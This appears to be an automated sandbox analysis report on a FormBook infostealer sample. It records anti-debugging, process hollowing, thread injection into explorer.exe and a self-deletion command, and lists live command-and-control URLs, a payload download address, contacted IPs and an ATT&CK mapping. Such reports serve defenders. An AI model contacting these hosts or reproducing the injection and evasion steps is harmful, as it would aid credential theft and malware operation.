Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341D91F0 mov eax, dword ptr fs:[00000030h]	2_2_341D91F0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]	2_2_341F01F1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]	2_2_341F01F1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]	2_2_341F01F1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341D81EB mov eax, dword ptr fs:[00000030h]	2_2_341D81EB
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E91E5 mov eax, dword ptr fs:[00000030h]	2_2_341E91E5
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E91E5 mov eax, dword ptr fs:[00000030h]	2_2_341E91E5
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]	2_2_341EA1E3
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]	2_2_341EA1E3
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]	2_2_341EA1E3
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]	2_2_341EA1E3
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]	2_2_341EA1E3

Source: C:\Windows\SysWOW64\cscript.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 2_2_34222C30 NtMapViewOfSection,LdrInitializeThunk,

2_2_34222C30

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 130.185.109.77 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.177.169.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.119.154.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.120.249.181 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.123 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.12.93.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.digitalserviceact.online
Source: C:\Windows\explorer.exe	Network Connect: 185.104.28.238 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.247.235.89 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.18.233.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.247.82.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.197.227.142 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: C0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Thread register set: target process: 5384			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 5384			Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"			Jump to behavior

Source: explorer.exe, 00000004.00000003.11262903343.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11268545969.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd?
Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.9895456281.0000000004880000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.9891803655.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14560591151.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

0_2_00403235

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	21 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	1 Masquerading	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MaMsKRmgXZ.exe	100%	Avira	HEUR/AGEN.1331786

Source	Detection	Scanner	Label
http://www.ps212naming.comReferer:	0%	Avira URL Cloud	safe
http://www.pwpholdings.comReferer:	0%	Avira URL Cloud	safe
https://th.bing.	0%	Avira URL Cloud	safe
http://www.pwpholdings.com	0%	Avira URL Cloud	safe
http://www.nala.dev/ro12/	100%	Avira URL Cloud	malware
http://www.los3.online/ro12/www.start399.com	100%	Avira URL Cloud	malware
http://www.xlrj.asia/ro12/www.fathomtackle.com	100%	Avira URL Cloud	malware
http://www.doubleapus.com/ro12/	100%	Avira URL Cloud	malware
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.los3.online/ro12/	100%	Avira URL Cloud	malware
http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/	100%	Avira URL Cloud	malware
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.nala.dev/ro12/www.rptiki.com	100%	Avira URL Cloud	malware
http://www.fathomtackle.com/ro12/www.digitalserviceact.online	100%	Avira URL Cloud	malware
http://www.ktrandnews.com/ro12/	100%	Avira URL Cloud	malware
http://www.qualityquickprints.comReferer:	0%	Avira URL Cloud	safe
http://www.niaeoer.com/ro12/www.shuraop.xyz	100%	Avira URL Cloud	malware
http://www.ktrandnews.com/ro12/www.nala.dev	100%	Avira URL Cloud	malware
http://www.senior-living-91799.bondReferer:	0%	Avira URL Cloud	safe
http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.fathomtackle.com	0%	Avira URL Cloud	safe
http://www.senior-living-91799.bond/ro12/www.riderarea.com	100%	Avira URL Cloud	malware
http://www.justinmburns.com/ro12/	100%	Avira URL Cloud	malware
http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.pwpholdings.com/ro12/www.justinmburns.com	0%	Avira URL Cloud	safe
http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	phishing
http://www.55dy5s.top/ro12/	100%	Avira URL Cloud	phishing
http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo	100%	Avira URL Cloud	phishing
http://www.pwpholdings.com/ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP	0%	Avira URL Cloud	safe
http://www.rptiki.com/ro12/www.tiktok-shop-he.com	100%	Avira URL Cloud	malware
https://word.office.comt.	0%	Avira URL Cloud	safe
http://www.ps212naming.com	100%	Avira URL Cloud	malware
http://www.shuraop.xyz/ro12/	100%	Avira URL Cloud	phishing
http://www.rptiki.com	100%	Avira URL Cloud	phishing
http://www.holzleisten24.shop/ro12/www.xlrj.asia	100%	Avira URL Cloud	malware
http://www.easyeats307.com/ro12/www.doubleapus.com	100%	Avira URL Cloud	malware
http://www.doubleapus.comReferer:	0%	Avira URL Cloud	safe
http://www.senior-living-91799.bond	0%	Avira URL Cloud	safe
http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.holzleisten24.shopReferer:	0%	Avira URL Cloud	safe
http://www.xlrj.asia	100%	Avira URL Cloud	phishing
http://www.holzleisten24.shop/ro12/	100%	Avira URL Cloud	malware
http://www.shuraop.xyz/ro12/www.qualityquickprints.com	100%	Avira URL Cloud	phishing
http://www.justinmburns.comReferer:	0%	Avira URL Cloud	safe
https://outlook.comQJ	0%	Avira URL Cloud	safe
http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
http://www.doubleapus.com	0%	Avira URL Cloud	safe
http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bin	100%	Avira URL Cloud	malware
http://www.pwpholdings.com/ro12/	0%	Avira URL Cloud	safe
http://www.senior-living-91799.bond/ro12/	100%	Avira URL Cloud	malware
http://www.easyeats307.comReferer:	0%	Avira URL Cloud	safe
http://ns.adobe.co	0%	Avira URL Cloud	safe
http://www.start399.comReferer:	0%	Avira URL Cloud	safe
http://www.tiktok-shop-he.com/ro12/	100%	Avira URL Cloud	malware
http://www.digitalserviceact.online/ro12/www.ddbetting.com	100%	Avira URL Cloud	malware
http://www.ktrandnews.com	0%	Avira URL Cloud	safe
http://www.xlrj.asiaReferer:	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.ddbetting.com/ro12/	100%	Avira URL Cloud	malware
http://www.tiktok-shop-he.comReferer:	0%	Avira URL Cloud	safe
https://cdn.queryF	0%	Avira URL Cloud	safe
http://www.riderarea.com/ro12/www.shuraop.xyz	100%	Avira URL Cloud	malware
http://www.rptiki.comReferer:	0%	Avira URL Cloud	safe
http://www.riderarea.com	0%	Avira URL Cloud	safe
http://www.shuraop.xyz/ro12/www.ktrandnews.com	100%	Avira URL Cloud	phishing
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.digitalserviceact.online/ro12/	100%	Avira URL Cloud	malware
http://www.doubleapus.com/ro12/www.holzleisten24.shop	100%	Avira URL Cloud	malware
http://www.ddbetting.com	0%	Avira URL Cloud	safe
http://www.tiktok-shop-he.com	100%	Avira URL Cloud	malware
http://www.digitalserviceact.onlineReferer:	0%	Avira URL Cloud	safe
http://www.digitalserviceact.online	0%	Avira URL Cloud	safe
http://www.holzleisten24.shop	0%	Avira URL Cloud	safe
http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.qualityquickprints.com	3.64.163.50	true	true	unknown
www.ps212naming.com	208.91.197.39	true	true	unknown
name.shoplazza.store	104.18.233.42	true	true	unknown
www.holzleisten24.shop	130.185.109.77	true	true	unknown
www.los3.online	172.177.169.252	true	true	unknown
www.senior-living-91799.bond	104.247.82.94	true	true	unknown
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com	18.119.154.66	true	false	high
www.start399.com	91.195.240.123	true	true	unknown
www.digitalserviceact.online	185.104.28.238	true	true	unknown
www.nala.dev	38.242.133.61	true	true	unknown
0826.93cu.com	154.12.93.8	true	true	unknown
www.ktrandnews.com	158.247.235.89	true	true	unknown
www.fathomtackle.com	154.197.227.142	true	true	unknown
www.riderarea.com	52.20.84.62	true	true	unknown
ddbetting.com	15.197.142.173	true	true	unknown
www.55dy5s.top	34.120.249.181	true	false	unknown
www.easyeats307.com	unknown	unknown	true	unknown
www.doubleapus.com	unknown	unknown	true	unknown
www.niaeoer.com	unknown	unknown	true	unknown
www.pwpholdings.com	unknown	unknown	true	unknown
www.justinmburns.com	unknown	unknown	true	unknown
www.xlrj.asia	unknown	unknown	true	unknown
www.ddbetting.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/	true	Avira URL Cloud: malware	unknown
http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP	false	Avira URL Cloud: phishing	unknown
http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.pwpholdings.com/ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: safe	unknown
http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo	false	Avira URL Cloud: phishing	unknown
http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bin	true	Avira URL Cloud: malware	unknown
http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown
http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.los3.online/ro12/	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ps212naming.comReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doubleapus.com/ro12/	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.nala.dev/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.pwpholdings.comReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xlrj.asia/ro12/www.fathomtackle.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.pwpholdings.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/house-gop-picks-steve-scalise-as-speaker-nominee-but-unclear	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg-dark	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.los3.online/ro12/www.start399.com	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://th.bing.	explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false		high
http://www.nala.dev/ro12/www.rptiki.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gopher.ftp://ftp.	MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ktrandnews.com/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fathomtackle.com/ro12/www.digitalserviceact.online	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.niaeoer.com/ro12/www.shuraop.xyz	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.senior-living-91799.bondReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qualityquickprints.comReferer:	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ktrandnews.com/ro12/www.nala.dev	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fathomtackle.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
